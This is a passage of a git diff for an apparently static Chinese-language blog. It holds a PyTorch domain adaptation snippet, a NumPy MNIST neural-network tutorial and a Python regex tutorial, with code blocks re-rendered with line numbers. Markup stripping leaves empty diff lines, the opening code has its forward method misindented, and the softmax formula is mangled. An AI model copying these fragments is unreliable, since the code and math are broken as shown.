        self.merge = merge() # 初始化一个合并模块。merge 可能是一个用于处理提取到的特征的模块。
        self.output = output() # 初始化一个输出模块。output 可能是一个用于生成最终预测的模块。

        self.DomainAdaptation = DomainAdaptationModule() # 初始化一个领域自适应模块。DomainAdaptationModule 可能用于对特征进行领域自适应处理,以适应不同的数据分布或任务。

        def forward(self, x): # forward 方法定义了前向传播的计算过程,即如何将输入数据 x 通过网络进行处理,得到模型的输出。
        C = self.extractor(x) # 将输入 x 传递给特征提取器,得到特征 C。C 可能是一个包含多个特征图的列表或字典,其中 C[3] 是其中的一个特征图。
        class_domain = self.DomainAdaptation(C[3]) # 将特征图 C[3] 传递给领域自适应模块,得到 class_domain。这是对特征图进行领域自适应处理后的结果。

        return self.output(self.merge(C)), class_domain
        # self.merge(C): 将特征 C 传递给合并模块,合并不同层的特征。
        # self.output(self.merge(C)): 将合并后的特征传递给输出模块,生成最终预测。
        # return self.output(self.merge(C)), class_domain:返回两个值,分别是模型的最终预测结果和领域自适应模块的输出。

        3.3 Text Self-Training

        • Self Training 文章梳理 - 知乎 (zhihu.com)
        • @@ -760,6 +758,8 @@

          目录

          var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/posts/Paper-\351\207\215\350\257\273-UnrealText-Synthesizing Realistic Scene Text Images from the Unreal World/index.html" "b/posts/Paper-\351\207\215\350\257\273-UnrealText-Synthesizing Realistic Scene Text Images from the Unreal World/index.html" index c1e80ff772..035058d18d 100644 --- "a/posts/Paper-\351\207\215\350\257\273-UnrealText-Synthesizing Realistic Scene Text Images from the Unreal World/index.html" +++ "b/posts/Paper-\351\207\215\350\257\273-UnrealText-Synthesizing Realistic Scene Text Images from the Unreal World/index.html" @@ -44,8 +44,6 @@ - - @@ -870,6 +868,8 @@

          目录

          var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/posts/Plan-BOSS\347\233\264\350\201\230\344\270\212\347\232\204\346\213\233\350\201\230\350\246\201\346\261\202/index.html" "b/posts/Plan-BOSS\347\233\264\350\201\230\344\270\212\347\232\204\346\213\233\350\201\230\350\246\201\346\261\202/index.html" index 9782e82a90..36e7713b00 100644 --- "a/posts/Plan-BOSS\347\233\264\350\201\230\344\270\212\347\232\204\346\213\233\350\201\230\350\246\201\346\261\202/index.html" +++ "b/posts/Plan-BOSS\347\233\264\350\201\230\344\270\212\347\232\204\346\213\233\350\201\230\350\246\201\346\261\202/index.html" @@ -44,8 +44,6 @@ - - @@ -875,6 +873,8 @@

          目录

          var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/posts/Plan-\344\270\200\344\272\233\345\255\246\344\271\240\350\256\241\345\210\222-\346\227\247/index.html" "b/posts/Plan-\344\270\200\344\272\233\345\255\246\344\271\240\350\256\241\345\210\222-\346\227\247/index.html" index 99dbb4be0d..89c1bb6bb3 100644 --- "a/posts/Plan-\344\270\200\344\272\233\345\255\246\344\271\240\350\256\241\345\210\222-\346\227\247/index.html" +++ "b/posts/Plan-\344\270\200\344\272\233\345\255\246\344\271\240\350\256\241\345\210\222-\346\227\247/index.html" @@ -44,8 +44,6 @@ - - @@ -858,6 +856,8 @@

          目录

          var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/posts/Plan-\344\270\200\344\272\233\347\245\236\345\245\207\345\260\217\347\275\221\347\253\231/index.html" "b/posts/Plan-\344\270\200\344\272\233\347\245\236\345\245\207\345\260\217\347\275\221\347\253\231/index.html" index 49d9816698..0fe89f1abf 100644 --- "a/posts/Plan-\344\270\200\344\272\233\347\245\236\345\245\207\345\260\217\347\275\221\347\253\231/index.html" +++ "b/posts/Plan-\344\270\200\344\272\233\347\245\236\345\245\207\345\260\217\347\275\221\347\253\231/index.html" @@ -44,8 +44,6 @@ - - @@ -1088,6 +1086,8 @@

          目录

          var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/posts/Plan-\345\257\271\350\256\272\346\226\207\347\232\204\347\233\256\345\211\215\346\203\263\346\263\225/index.html" "b/posts/Plan-\345\257\271\350\256\272\346\226\207\347\232\204\347\233\256\345\211\215\346\203\263\346\263\225/index.html" index b620252059..e9113b19b9 100644 --- "a/posts/Plan-\345\257\271\350\256\272\346\226\207\347\232\204\347\233\256\345\211\215\346\203\263\346\263\225/index.html" +++ "b/posts/Plan-\345\257\271\350\256\272\346\226\207\347\232\204\347\233\256\345\211\215\346\203\263\346\263\225/index.html" @@ -44,8 +44,6 @@ - - @@ -617,7 +615,7 @@

          在场景文本编辑中作字体识别,直接从字体文件中找到该字体的其他字符,作为字体生成的备用方案。

          ​ 其他:Font Recognition with Deep Learning | by Jehad Mohamed | MLearning.ai | Medium 这个较老,2015 年的,就是卷积神经网络一阵卷。

          Text Recognition in the Wild:A Survey

          -

          见:[Paper-Text Recognition in the Wild-A Survey-Zi-Zi’s Journey](…/…/…/…/2023/03/26/Paper-Text Recognition in the Wild-A Survey/)

          +

          见:[Paper-Text Recognition in the Wild-A Survey-Zi-Zi’s Journey](…//Paper-Text Recognition in the Wild-A Survey/)

          @@ -835,6 +833,8 @@

          目录

          var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/posts/Plan-\350\277\231\346\230\257\344\270\200\347\257\207\345\212\240\345\257\206\346\216\250\346\226\207/Plan-1/index.html" "b/posts/Plan-\350\277\231\346\230\257\344\270\200\347\257\207\345\212\240\345\257\206\346\216\250\346\226\207/Plan-1/index.html" index f3d2099a15..a82f3e1de5 100644 --- "a/posts/Plan-\350\277\231\346\230\257\344\270\200\347\257\207\345\212\240\345\257\206\346\216\250\346\226\207/Plan-1/index.html" +++ "b/posts/Plan-\350\277\231\346\230\257\344\270\200\347\257\207\345\212\240\345\257\206\346\216\250\346\226\207/Plan-1/index.html" @@ -44,8 +44,6 @@ - - @@ -616,6 +614,8 @@

          目录

          var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/posts/Plan-\350\277\231\346\230\257\344\270\200\347\257\207\345\212\240\345\257\206\346\216\250\346\226\207/Plan-2/index.html" "b/posts/Plan-\350\277\231\346\230\257\344\270\200\347\257\207\345\212\240\345\257\206\346\216\250\346\226\207/Plan-2/index.html" index d695e6bd2e..afa2914667 100644 --- "a/posts/Plan-\350\277\231\346\230\257\344\270\200\347\257\207\345\212\240\345\257\206\346\216\250\346\226\207/Plan-2/index.html" +++ "b/posts/Plan-\350\277\231\346\230\257\344\270\200\347\257\207\345\212\240\345\257\206\346\216\250\346\226\207/Plan-2/index.html" @@ -44,17 +44,6 @@ - - - - - - - - - - - @@ -415,7 +404,7 @@

          Plan-2

        内容

        导入相关库

        -
        import numpy as np
        import pandas as pd
        from matplotlib import pyplot as plt
        +
        1
        2
        3
        import numpy as np
        import pandas as pd
        from matplotlib import pyplot as plt

        读取数据集

        -
        data = pd.read_csv('kaggle/input/digit-recognizer/train.csv')
        -
        data.shape
        +
        1
        data = pd.read_csv('kaggle/input/digit-recognizer/train.csv')
        +
        1
        data.shape
        (42000, 785)
         

        数组形状:$(42000, 785)$, 说明:

        @@ -436,7 +434,7 @@

        将数据集分为训练集和测试集

        -
        data = np.array(data)  # 将数据集从 pd.DataFrame 转为 np.array
        m, n = data.shape
        np.random.shuffle(data) # shuffle 直接在原来的数组上进行操作,改变原来数组的顺序,无返回值

        # 验证集
        data_dev = data[0:1000].T # 前 1000 个
        Y_dev = data_dev[0]
        X_dev = data_dev[1:n]
        X_dev = X_dev / 255. # 将图像各像素点的灰度值映射到 0 到 1 之间的浮点数,使之后的 exp 运算不会溢出

        # 训练集
        data_train = data[1000:m].T
        Y_train = data_train[0]
        X_train = data_train[1:n]
        X_train = X_train / 255.
        _,m_train = X_train.shape
        +
        1
        2
        3
        4
        5
        6
        7
        8
        9
        10
        11
        12
        13
        14
        15
        16
        data = np.array(data)  # 将数据集从 pd.DataFrame 转为 np.array
        m, n = data.shape
        np.random.shuffle(data) # shuffle 直接在原来的数组上进行操作,改变原来数组的顺序,无返回值

        # 验证集
        data_dev = data[0:1000].T # 前 1000 个
        Y_dev = data_dev[0]
        X_dev = data_dev[1:n]
        X_dev = X_dev / 255. # 将图像各像素点的灰度值映射到 0 到 1 之间的浮点数,使之后的 exp 运算不会溢出

        # 训练集
        data_train = data[1000:m].T
        Y_train = data_train[0]
        X_train = data_train[1:n]
        X_train = X_train / 255.
        _,m_train = X_train.shape

        定义相关函数

        ​ Our NN will have a simple two-layer architecture. Input layer $a^{[0]}$ will have $784$ units corresponding to the $784$ pixels in each $28\times 28$ input image. A hidden layer $a^{[1]}$ will have $10$ units with ReLU activation, and finally our output layer $a^{[2]}$ will have $10$ units corresponding to the ten digit classes with softmax activation.

        ​ 我们的神经网络将有一个简单的两层结构。输入层 $a^{[0]}$ 将有 $784$ 个单元,对应于每个 $28\times 28$ 输入图像中的 $784$ 个像素。隐藏层 $a^{[1]}$ 将有 $10$ 个单元,用 ReLU 激活,最后我们的输出层 $a^{[2]}$ 将有 $10$ 个单元,对应于用 softmax 激活的 $10$ 个数字类别。

        @@ -465,9 +463,9 @@

        初始化参数

        使初始参数随机在 [-0.5, 0.5) 之间

        通过 np.random.rand() 可以返回一个或一组服从“0 ~ 1”均匀分布的随机样本值。随机样本取值范围是 [0, 1),不包括 1。

        -
        def init_params():
        W1 = np.random.rand(10, 784) - 0.5
        b1 = np.random.rand(10, 1) - 0.5
        W2 = np.random.rand(10, 10) - 0.5
        b2 = np.random.rand(10, 1) - 0.5
        return W1, b1, W2, b2
        +
        1
        2
        3
        4
        5
        6
        def init_params():
        W1 = np.random.rand(10, 784) - 0.5
        b1 = np.random.rand(10, 1) - 0.5
        W2 = np.random.rand(10, 10) - 0.5
        b2 = np.random.rand(10, 1) - 0.5
        return W1, b1, W2, b2

        激活函数: ReLU

        -
        def ReLU(Z):
        return np.maximum(Z, 0)
        +
        1
        2
        def ReLU(Z):
        return np.maximum(Z, 0)

        Softmax

    $Softmax(z_i)=\frac{ez_i}{\sumC_{C=1}e^{z_C}}$,其中 $z_i$ 为第 $i$ 个节点的输出值,$C$ 为输出结点的个数,即分类的类别个数。通过 Softmax 函数就可以将多分类的输出值转换为范围在 [0, 1] 和为 1 的概率分布。

    png

    -
    def softmax(Z):
    A = np.exp(Z) / sum(np.exp(Z))
    return A
    +
    1
    2
    3
    def softmax(Z):
    A = np.exp(Z) / sum(np.exp(Z))
    return A

    前向传播

    $$Z^{[1]} = W^{[1]} X + b^{[1]}$$
    $$A^{[1]} = g_{\text{ReLU}}(Z^{[1]}))$$
    $$Z^{[2]} = W^{[2]} A^{[1]} + b^{[2]}$$
    $$A^{[2]} = g_{\text{softmax}}(Z^{[2]})$$

    -
    def forward_prop(W1, b1, W2, b2, X):
    Z1 = W1.dot(X) + b1
    A1 = ReLU(Z1)
    Z2 = W2.dot(A1) + b2
    A2 = softmax(Z2)
    return Z1, A1, Z2, A2
    +
    1
    2
    3
    4
    5
    6
    def forward_prop(W1, b1, W2, b2, X):
    Z1 = W1.dot(X) + b1
    A1 = ReLU(Z1)
    Z2 = W2.dot(A1) + b2
    A2 = softmax(Z2)
    return Z1, A1, Z2, A2

    ReLU 函数的导数,用于梯度下降

    -
    def ReLU_deriv(Z):
    return Z > 0
    +
    1
    2
    def ReLU_deriv(Z):
    return Z > 0

    独热编码

    将标签 Y 转为独热编码:

    -
    def one_hot(Y):
    one_hot_Y = np.zeros((Y.size, Y.max() + 1))
    one_hot_Y[np.arange(Y.size), Y] = 1
    one_hot_Y = one_hot_Y.T
    return one_hot_Y
    +
    1
    2
    3
    4
    5
    def one_hot(Y):
    one_hot_Y = np.zeros((Y.size, Y.max() + 1))
    one_hot_Y[np.arange(Y.size), Y] = 1
    one_hot_Y = one_hot_Y.T
    return one_hot_Y

    反向传播

    $$dZ^{[2]} = A^{[2]} - Y$$
    $$dW^{[2]} = \frac{1}{m} dZ^{[2]} A^{[1]T}$$
    @@ -496,24 +494,24 @@

    $$dZ^{[1]} = W^{[2]T} dZ^{[2]} .* g^{[1]\prime} (z^{[1]})$$
    $$dW^{[1]} = \frac{1}{m} dZ^{[1]} A^{[0]T}$$
    $$dB^{[1]} = \frac{1}{m} \Sigma {dZ^{[1]}}$$

    -
    def backward_prop(Z1, A1, Z2, A2, W1, W2, X, Y):
    one_hot_Y = one_hot(Y)
    dZ2 = A2 - one_hot_Y
    dW2 = 1 / m * dZ2.dot(A1.T)
    db2 = 1 / m * np.sum(dZ2)
    dZ1 = W2.T.dot(dZ2) * ReLU_deriv(Z1)
    dW1 = 1 / m * dZ1.dot(X.T)
    db1 = 1 / m * np.sum(dZ1)
    return dW1, db1, dW2, db2
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    def backward_prop(Z1, A1, Z2, A2, W1, W2, X, Y):
    one_hot_Y = one_hot(Y)
    dZ2 = A2 - one_hot_Y
    dW2 = 1 / m * dZ2.dot(A1.T)
    db2 = 1 / m * np.sum(dZ2)
    dZ1 = W2.T.dot(dZ2) * ReLU_deriv(Z1)
    dW1 = 1 / m * dZ1.dot(X.T)
    db1 = 1 / m * np.sum(dZ1)
    return dW1, db1, dW2, db2

    调整参数

    根据学习率 alpha 调整参数:

    $$W^{[2]} := W^{[2]} - \alpha dW^{[2]}$$
    $$b^{[2]} := b^{[2]} - \alpha db^{[2]}$$
    $$W^{[1]} := W^{[1]} - \alpha dW^{[1]}$$
    $$b^{[1]} := b^{[1]} - \alpha db^{[1]}$$

    -
    def update_params(W1, b1, W2, b2, dW1, db1, dW2, db2, alpha):
    W1 = W1 - alpha * dW1
    b1 = b1 - alpha * db1
    W2 = W2 - alpha * dW2
    b2 = b2 - alpha * db2
    return W1, b1, W2, b2
    +
    1
    2
    3
    4
    5
    6
    def update_params(W1, b1, W2, b2, dW1, db1, dW2, db2, alpha):
    W1 = W1 - alpha * dW1
    b1 = b1 - alpha * db1
    W2 = W2 - alpha * dW2
    b2 = b2 - alpha * db2
    return W1, b1, W2, b2

    预测结果

    numpy.argmax() 函数返回特定轴上数组的最大元素的索引,选取可能性最大的分类结果作为最终的分类结果。

    -
    def get_predictions(A2):
    return np.argmax(A2, 0)
    +
    1
    2
    def get_predictions(A2):
    return np.argmax(A2, 0)

    计算准确率

    -
    def get_accuracy(predictions, Y):
    print(predictions, Y)
    return np.sum(predictions == Y) / Y.size # 准确率 = 正确数 / 总数
    +
    1
    2
    3
    def get_accuracy(predictions, Y):
    print(predictions, Y)
    return np.sum(predictions == Y) / Y.size # 准确率 = 正确数 / 总数

    梯度下降

    -
    def gradient_descent(X, Y, alpha, iterations):
    W1, b1, W2, b2 = init_params() # 初始化参数
    for i in range(iterations):
    Z1, A1, Z2, A2 = forward_prop(W1, b1, W2, b2, X) # 前向传播
    dW1, db1, dW2, db2 = backward_prop(Z1, A1, Z2, A2, W1, W2, X, Y) # 反向传播
    W1, b1, W2, b2 = update_params(W1, b1, W2, b2, dW1, db1, dW2, db2, alpha) # 调参
    if i % 10 == 0: # 每训练 10 个 epoch 就显示一次准确率
    print("Iteration:", i)
    predictions = get_predictions(A2)
    print("Accuray:", get_accuracy(predictions, Y))
    return W1, b1, W2, b2
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    def gradient_descent(X, Y, alpha, iterations):
    W1, b1, W2, b2 = init_params() # 初始化参数
    for i in range(iterations):
    Z1, A1, Z2, A2 = forward_prop(W1, b1, W2, b2, X) # 前向传播
    dW1, db1, dW2, db2 = backward_prop(Z1, A1, Z2, A2, W1, W2, X, Y) # 反向传播
    W1, b1, W2, b2 = update_params(W1, b1, W2, b2, dW1, db1, dW2, db2, alpha) # 调参
    if i % 10 == 0: # 每训练 10 个 epoch 就显示一次准确率
    print("Iteration:", i)
    predictions = get_predictions(A2)
    print("Accuray:", get_accuracy(predictions, Y))
    return W1, b1, W2, b2

    训练神经网络

    最后得到的准确率以及神经网络的各个参数:

    -
    W1, b1, W2, b2 = gradient_descent(X_train, Y_train, 0.10, 500)
    +
    1
    W1, b1, W2, b2 = gradient_descent(X_train, Y_train, 0.10, 500)
    Iteration: 0
     [2 2 9 ... 9 2 2] [6 1 2 ... 5 3 1]
     Accuray: 0.13534146341463416
    @@ -668,10 +666,10 @@ 

    最后得到 85.01% 的准确率。

    训练结果可视化

    将训练好的模型做出预测

    -
    def make_predictions(X, W1, b1, W2, b2):
    _, _, _, A2 = forward_prop(W1, b1, W2, b2, X)
    predictions = get_predictions(A2)
    return predictions
    -
    def test_prediction(index, W1, b1, W2, b2):
    current_image = X_train[:, index, None]
    prediction = make_predictions(X_train[:, index, None], W1, b1, W2, b2)
    label = Y_train[index]
    print("Prediction: ", prediction)
    print("Label: ", label)

    current_image = current_image.reshape((28, 28)) * 255
    plt.gray() # matplotlib 库的 pyplot 模块中的 gray() 函数用于将颜色映射设置为“gray”。
    plt.imshow(current_image, interpolation='nearest')
    plt.show()
    +
    1
    2
    3
    4
    def make_predictions(X, W1, b1, W2, b2):
    _, _, _, A2 = forward_prop(W1, b1, W2, b2, X)
    predictions = get_predictions(A2)
    return predictions
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    def test_prediction(index, W1, b1, W2, b2):
    current_image = X_train[:, index, None]
    prediction = make_predictions(X_train[:, index, None], W1, b1, W2, b2)
    label = Y_train[index]
    print("Prediction: ", prediction)
    print("Label: ", label)

    current_image = current_image.reshape((28, 28)) * 255
    plt.gray() # matplotlib 库的 pyplot 模块中的 gray() 函数用于将颜色映射设置为“gray”。
    plt.imshow(current_image, interpolation='nearest')
    plt.show()

    Let’s look at a couple of examples:

    -
    test_prediction(0, W1, b1, W2, b2)
    test_prediction(1, W1, b1, W2, b2)
    test_prediction(2, W1, b1, W2, b2)
    test_prediction(3, W1, b1, W2, b2)
    +
    1
    2
    3
    4
    test_prediction(0, W1, b1, W2, b2)
    test_prediction(1, W1, b1, W2, b2)
    test_prediction(2, W1, b1, W2, b2)
    test_prediction(3, W1, b1, W2, b2)
    Prediction:  [1]
     Label:  1
     
    @@ -689,7 +687,7 @@

    png

    将训练结果用于验证集

    -
    dev_predictions = make_predictions(X_dev, W1, b1, W2, b2)
    get_accuracy(dev_predictions, Y_dev)
    +
    1
    2
    dev_predictions = make_predictions(X_dev, W1, b1, W2, b2)
    get_accuracy(dev_predictions, Y_dev)
    [6 3 3 4 3 5 9 2 2 0 6 4 9 5 9 4 1 2 7 9 0 0 3 1 1 2 5 1 0 6 8 4 6 4 1 1 0
      8 3 1 8 4 6 0 0 8 6 0 2 7 9 1 7 8 6 3 3 0 6 1 0 9 6 9 6 4 4 4 4 0 0 7 1 6
      6 0 6 4 7 9 6 1 6 1 5 5 0 2 9 9 3 9 4 9 7 7 9 9 1 1 1 6 0 8 3 7 8 6 0 2 5
    @@ -968,6 +966,8 @@ 

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/posts/Python-Regular Expressions made Easy/index.html b/posts/Python-Regular Expressions made Easy/index.html index 4518a9e478..34aef02051 100644 --- a/posts/Python-Regular Expressions made Easy/index.html +++ b/posts/Python-Regular Expressions made Easy/index.html @@ -44,8 +44,6 @@ - - @@ -475,21 +473,21 @@

    Things to note

    python 正则表达式 re.search()怎么使用?

    re.search(pattern, string, flags =0)

    -
    import re
    re.search('n', '\n') # first item is pattern, second item is string
    -
    # two ways to handle this one way is to use \ for every backslash
    # 有两种处理方法,一种方法是对每个反斜杠使用\ (另一种是在前面加 r)
    re.search('n', '\\n')
    +
    1
    2
    import re
    re.search('n', '\n') # first item is pattern, second item is string
    +
    1
    2
    3
    # two ways to handle this one way is to use \ for every backslash
    # 有两种处理方法,一种方法是对每个反斜杠使用\ (另一种是在前面加 r)
    re.search('n', '\\n')
    <re.Match object; span=(1, 2), match='n'>
     
    -
    # not the best way if we have too many \s
    # 如果我们有太多的\,这不是最好的方法
    re.search('n', '\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n')
    -
    # r converts to raw string
    # r 转换为原始字符串
    re.search('n', r'\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n')
    +
    1
    2
    3
    # not the best way if we have too many \s
    # 如果我们有太多的\,这不是最好的方法
    re.search('n', '\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n')
    +
    1
    2
    3
    # r converts to raw string
    # r 转换为原始字符串
    re.search('n', r'\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n')
    <re.Match object; span=(1, 2), match='n'>
     
    -
    """
    there are some nuances that you should be aware of regular expressions
    has its own special characters as well regex with '\n' and r'\n' both
    look for newline.
    你应该注意到一些细微的差别,正则表达式也有自己的特殊字符,
    带有'\n'和 r'\n'的正则表达式都查找换行符
    """
    re.search('\n', '\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n')
    +
    1
    2
    3
    4
    5
    6
    7
    8
    """
    there are some nuances that you should be aware of regular expressions
    has its own special characters as well regex with '\n' and r'\n' both
    look for newline.
    你应该注意到一些细微的差别,正则表达式也有自己的特殊字符,
    带有'\n'和 r'\n'的正则表达式都查找换行符
    """
    re.search('\n', '\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n')
    <re.Match object; span=(0, 1), match='\n'>
     
    -
    # this works as well because r'\n' also looks for new line
    # 同样有效,因为 pattern 中 r'\n' 也会查找新行
    re.search(r'\n', '\n\n')
    +
    1
    2
    3
    # this works as well because r'\n' also looks for new line
    # 同样有效,因为 pattern 中 r'\n' 也会查找新行
    re.search(r'\n', '\n\n')
    <re.Match object; span=(0, 1), match='\n'>
     
    -
    # doesn't work because string doesn't use newline and r'\n' looks for newline
    # 不能工作,因为 string 不使用换行符,而 pattern 中 r'\n'查找换行符
    re.search(r'\n', r'\n\n')
    +
    1
    2
    3
    # doesn't work because string doesn't use newline and r'\n' looks for newline
    # 不能工作,因为 string 不使用换行符,而 pattern 中 r'\n'查找换行符
    re.search(r'\n', r'\n\n')

    MATCH and SEARCH EXAMPLES

    REs common methods - Match and Search

      @@ -501,69 +499,69 @@

      MATCH and SEARCH EXAMPLES

    • only beginning of the string 只搜索字符串的开始

    re.match(pattern, string, flags)

    -
    # returns none because only looks at the start of string
    # 返回 none,因为只查看字符串的开头
    re.match("c", "abcdef")
    -
    re.search("c", "abcdef")  # searches anywhere
    +
    1
    2
    3
    # returns none because only looks at the start of string
    # 返回 none,因为只查看字符串的开头
    re.match("c", "abcdef")
    +
    1
    re.search("c", "abcdef")  # searches anywhere
    <re.Match object; span=(2, 3), match='c'>
     
    -
    bool(re.match("c", "abcdef"))  # no match returns boolean false
    +
    1
    bool(re.match("c", "abcdef"))  # no match returns boolean false
    False
     
    -
    bool(re.match("a", "abcdef"))  # match returns true
    +
    1
    bool(re.match("a", "abcdef"))  # match returns true
    True
     
    -
    # tells you where it matched first and only first
    # 告诉你它首先匹配的位置
    re.search("c", "abcdef")
    +
    1
    2
    3
    # tells you where it matched first and only first
    # 告诉你它首先匹配的位置
    re.search("c", "abcdef")
    <re.Match object; span=(2, 3), match='c'>
     
    -
    re.search("c", "abcdefc")  # multiple 'c's first instance only 返回多个 c 的第一个实例
    +
    1
    re.search("c", "abcdefc")  # multiple 'c's first instance only 返回多个 c 的第一个实例
    <re.Match object; span=(2, 3), match='c'>
     
    -
    re.search("c", "abdef\nc")  # multiline works with search 多行与搜索一起工作
    +
    1
    re.search("c", "abdef\nc")  # multiline works with search 多行与搜索一起工作
    <re.Match object; span=(6, 7), match='c'>
     
    -
    re.match("c", "\nc")  # match doesn't work with newline 匹配对换行符无效
    +
    1
    re.match("c", "\nc")  # match doesn't work with newline 匹配对换行符无效
    -
    (re.match("a", "abcdef"))  # match objects
    +
    1
    (re.match("a", "abcdef"))  # match objects
    <re.Match object; span=(0, 1), match='a'>
     

    python 正则匹配中 re.match().group(num=0)

    -
    re.match("a", "abcdef").group()  # string output # defautlt value is 0 默认值为 0 
    +
    1
    re.match("a", "abcdef").group()  # string output # defautlt value is 0 默认值为 0 
    'a'
     
    -
    re.match("a", "abcdef").group(0)  
    +
    1
    re.match("a", "abcdef").group(0)  
    'a'
     
    -
    re.search("n", "abcdefnc abcd").group()
    +
    1
    re.search("n", "abcdefnc abcd").group()
    'n'
     
    -
    re.search('n.+', "abcdefnc abcd").group()  # pull out different types of strings 拿出不同类型的字符串
    # depending on the wildcards you use 这取决于您使用的通配符
    +
    1
    2
    re.search('n.+', "abcdefnc abcd").group()  # pull out different types of strings 拿出不同类型的字符串
    # depending on the wildcards you use 这取决于您使用的通配符
    'nc abcd'
     

    python 正则(2)group/start/end/span 方法

    -
    re.search("c", "abdef\nc").start()
    +
    1
    re.search("c", "abdef\nc").start()
    6
     
    -
    re.search("c", "abdef\nc").end()
    +
    1
    re.search("c", "abdef\nc").end()
    7
     

    Literal matching

    -
    re.search('na',"abcdefnc abcd" )  # doesn't work, because they are ordered 无效,因为它们是有序的
    -
    re.search('n|a',"abcdefnc abcda" )  # n or a
    +
    1
    re.search('na',"abcdefnc abcd" )  # doesn't work, because they are ordered 无效,因为它们是有序的
    +
    1
    re.search('n|a',"abcdefnc abcda" )  # n or a
    <re.Match object; span=(0, 1), match='a'>
     
    -
    re.search('n|a',"bcdefnc abcda" )  # replaced the a with b, first match is an n
    +
    1
    re.search('n|a',"bcdefnc abcda" )  # replaced the a with b, first match is an n
    <re.Match object; span=(5, 6), match='n'>
     
    -
    re.search('n|a|b',"bcdefnc abcda" ) # as many OR expressions
    +
    1
    re.search('n|a|b',"bcdefnc abcda" ) # as many OR expressions
    <re.Match object; span=(0, 1), match='b'>
     

    re.findall

    -
    re.findall('n|a',"bcdefnc abcda" ) # find all pulls out all instances 取出所有实例
    +
    1
    re.findall('n|a',"bcdefnc abcda" ) # find all pulls out all instances 取出所有实例
    ['n', 'a', 'a']
     
    -
    re.search('abcd',"abcdefnc abcd" ) # multiple characters - literal search 多字符-文字搜索
    +
    1
    re.search('abcd',"abcdefnc abcd" ) # multiple characters - literal search 多字符-文字搜索
    <re.Match object; span=(0, 4), match='abcd'>
     
    -
    re.findall('abcd',"abcdefnc abcd" ) 
    +
    1
    re.findall('abcd',"abcdefnc abcd" ) 
    ['abcd', 'abcd']
     

    CHARACTER SETS

    @@ -574,26 +572,26 @@

    CHARACTER SETS

    -
    import re
    re.search('abcd',"abcdefnc abcd" ) # earlier code 之前的代码
    +
    1
    2
    import re
    re.search('abcd',"abcdefnc abcd" ) # earlier code 之前的代码
    <re.Match object; span=(0, 4), match='abcd'>
     
    -
    re.search(r'\w\w\w\w',"abcdefnc abcd" )  # matches characters and numbers 匹配字符和数字
    # alpha numeric characters
    +
    1
    2
    re.search(r'\w\w\w\w',"abcdefnc abcd" )  # matches characters and numbers 匹配字符和数字
    # alpha numeric characters
    <re.Match object; span=(0, 4), match='abcd'>
     

    \w matches alpha numeric characters [a-zA-Z0-9_]

    -
    re.search(r'\w\w\w\w',"ab_cdefnc abcd" )  # matches _ character 匹配_字符
    +
    1
    re.search(r'\w\w\w\w',"ab_cdefnc abcd" )  # matches _ character 匹配_字符
    <re.Match object; span=(0, 4), match='ab_c'>
     
    -
    re.search(r'\w\w\w', "a3.!-!")  # doesn't match symbols only numbers and characters 不匹配符号,只匹配数字和字符
    -
    re.search(r'\w\w\w', "a33-_!") .group()
    +
    1
    re.search(r'\w\w\w', "a3.!-!")  # doesn't match symbols only numbers and characters 不匹配符号,只匹配数字和字符
    +
    1
    re.search(r'\w\w\w', "a33-_!") .group()
    'a33'
     

    \W opposite of \w ;

    so nothing included in [a-zA-Z0-9_]

    -
    re.search(r'\w\w\W', "a3.-_!")  # \W matches non characters and numbers
    # \W 匹配非字符和数字
    +
    1
    2
    re.search(r'\w\w\W', "a3.-_!")  # \W matches non characters and numbers
    # \W 匹配非字符和数字
    <re.Match object; span=(0, 3), match='a3.'>
     
    -
    re.search(r'\w\w\W', "a3 .-_!")  # matches empty space as well 
    # \W 也可以匹配空格
    +
    1
    2
    re.search(r'\w\w\W', "a3 .-_!")  # matches empty space as well 
    # \W 也可以匹配空格
    <re.Match object; span=(0, 3), match='a3 '>
     

    We will go over other character sets later on

    @@ -608,25 +606,25 @@

    Let’s go ove -
    re.search(r'\w\w',"abcdefnc abcd" )
    +
    1
    re.search(r'\w\w',"abcdefnc abcd" )
    <re.Match object; span=(0, 2), match='ab'>
     
    -
    re.search(r'\w+',"abcdefnc abcd" ).group()  # don't know the numbers of letters 不知道单词的字母个数
    +
    1
    re.search(r'\w+',"abcdefnc abcd" ).group()  # don't know the numbers of letters 不知道单词的字母个数
    'abcdefnc'
     
    -
    re.search(r'\w+\W+\w+',"abcdefnc abcd").group()
    +
    1
    re.search(r'\w+\W+\w+',"abcdefnc abcd").group()
    'abcdefnc abcd'
     
    -
    re.search('\w+\W+\w+',"abcdefnc       abcd").group()  # added spaces
    +
    1
    re.search('\w+\W+\w+',"abcdefnc       abcd").group()  # added spaces
    'abcdefnc       abcd'
     
    -
    re.search(r'\w+\W?\w+',"abcdefnabcd").group()  # ? = 0 or 1 instances
    +
    1
    re.search(r'\w+\W?\w+',"abcdefnabcd").group()  # ? = 0 or 1 instances
    'abcdefnabcd'
     
    -
    re.search(r'\w+\W?\w+',"abcde fnabcd").group()
    +
    1
    re.search(r'\w+\W?\w+',"abcde fnabcd").group()
    'abcde fnabcd'
     
    -
    re.search(r'\w+\W+\w+', "abcdefnabcd")
    +
    1
    re.search(r'\w+\W+\w+', "abcdefnabcd")
    • Pulling out specific amounts
        @@ -634,31 +632,31 @@

        Let’s go ove

    -
    re.search(r'\w{3}', 'aaaaaaaaaaa')  # only 3 \w characters
    +
    1
    re.search(r'\w{3}', 'aaaaaaaaaaa')  # only 3 \w characters
    <re.Match object; span=(0, 3), match='aaa'>
     
    -
    re.search(r'\w{1,4}', 'aaaaaaaaaaa').group()  #1 is min, 4 is max
    +
    1
